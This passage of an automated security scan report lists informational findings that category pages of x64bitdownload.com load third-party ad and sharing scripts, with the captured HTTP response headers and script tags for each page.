...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1408. http://www.x64bitdownload.com/categories/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:25:23 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:35:27 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2240%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 66926

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1409. http://www.x64bitdownload.com/categories/free-64-bit-communications-downloads-3-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-downloads-3-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:24:31 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:34:39 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 82470

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1410. http://www.x64bitdownload.com/categories/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:25:26 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:35:41 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2241%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 79258

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1411. http://www.x64bitdownload.com/categories/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:25:28 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:35:28 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2242%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1412. http://www.x64bitdownload.com/categories/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:25:31 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:35:43 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2243%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 77654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1413. http://www.x64bitdownload.com/categories/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:25:35 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:36:05 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52725

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1414. http://www.x64bitdownload.com/categories/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:26:46 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:36:48 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2248%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 76989

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1415. http://www.x64bitdownload.com/categories/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:26:54 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:37:00 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2249%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 78664

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1416. http://www.x64bitdownload.com/categories/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:26:24 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:36:26 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2245%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44061

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1417. http://www.x64bitdownload.com/categories/free-64-bit-communications-telephony-downloads-3-46-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-telephony-downloads-3-46-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:26:30 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:36:46 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2246%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81531

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1418. http://www.x64bitdownload.com/categories/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:26:46 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:37:05 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2247%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81928

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1419. http://www.x64bitdownload.com/categories/free-64-bit-desktop-downloads-4-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-desktop-downloads-4-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:26:58 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:37:09 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%224%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 76654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1420. http://www.x64bitdownload.com/categories/free-64-bit-development-downloads-5-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-development-downloads-5-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:27:12 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:37:20 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%225%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 77292

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1421. http://www.x64bitdownload.com/categories/free-64-bit-education-downloads-6-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-education-downloads-6-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:27:22 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:37:27 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%226%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 74554

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1422. http://www.x64bitdownload.com/categories/free-64-bit-games-entertainment-downloads-7-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-games-entertainment-downloads-7-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:28:05 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:38:11 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%227%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86717

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1423. http://www.x64bitdownload.com/categories/free-64-bit-graphic-apps-downloads-8-0-d.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/categories/free-64-bit-graphic-apps-downloads-8-0-d.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:28:18 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:38:25 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%228%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81027

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
